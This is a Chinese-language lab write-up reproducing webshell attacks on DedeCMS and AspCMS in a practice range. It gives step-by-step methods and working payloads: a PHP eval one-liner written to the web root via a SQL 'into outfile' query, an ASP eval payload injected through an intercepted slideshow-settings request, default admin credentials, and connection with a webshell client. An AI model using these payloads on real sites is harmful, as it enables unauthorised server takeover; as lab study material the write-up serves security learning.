dedecms(四种webshell姿势)aspcms webshell漏洞复现

dedecms

我们首先访问靶场

姿势1上传文件getshell

首先登录后台

点击文件管理器》文件上传

写一个php一句话木马文件

然后进行上传

点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径

然后我们进行访问并连接

连接成功

姿势2 修改模版文件getshell

点击模版找到index.html 并点击修改

在代码的开头写入php一句话木马,点击保存

然后返回点击生成,修改网页为静态网页

然后进行访问

并连接

姿势3后台任意命令执行getshell

模块》广告管理》增加一个新广告

在广告内容里写入一句话木马

然后点击代码在,里面找到文件的路径

访问并连接

姿势4 sql命令执行写入php木马getshell

点击系统》sql命令执行工具》写入payload

复制代码
select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"

然后直接访问我们写入的2.php文件并进行连接

aspcms

访问网站出现报错

说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问

访问后台管理页面,并使用账号密码登录

admin 123456

然后点击扩展》幻灯片设置》点击保存时进行抓包

在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp

文件内容

1%25><%25Eval(Request(chr(65)))%25><%25 密码为a

然后进行访问并进行连接

使用菜刀进行连接,并成功getshell

相关推荐
长安城没有风8 分钟前
从入门到精通【MySQL】 联合查询
数据库·mysql
ylfhpy26 分钟前
Java面试黄金宝典35
java·数据库·sql·算法·面试·职场和发展
不剪发的Tony老师28 分钟前
SQLark:一款国产免费数据库开发和管理工具
数据库
我是Superman丶36 分钟前
【工具】Redis管理工具推荐
运维·数据库·redis
xiaolingting37 分钟前
Redis 与 Java HashMap 扩容负载因子差异解析
数据库·redis·hashmap·负载因子·内存碎片·内存敏感·渐进式扩容
给钱,谢谢!1 小时前
mac 安装MySQL
数据库·mysql·macos
GalaxyPokemon1 小时前
MySQL基础 [五] - 表的增删查改
数据库·mysql
梦远星帆1 小时前
Navicat和PLSQL在oracle 使用语句报ORA-00911: 无效字符
数据库·oracle
Tyler先森2 小时前
Oracle数据库数据编程SQL<5 正则表达式函数*****>
数据库·sql·oracle
haaaaaaarry2 小时前
【SQL】子查询详解(附例题)
java·数据库·sql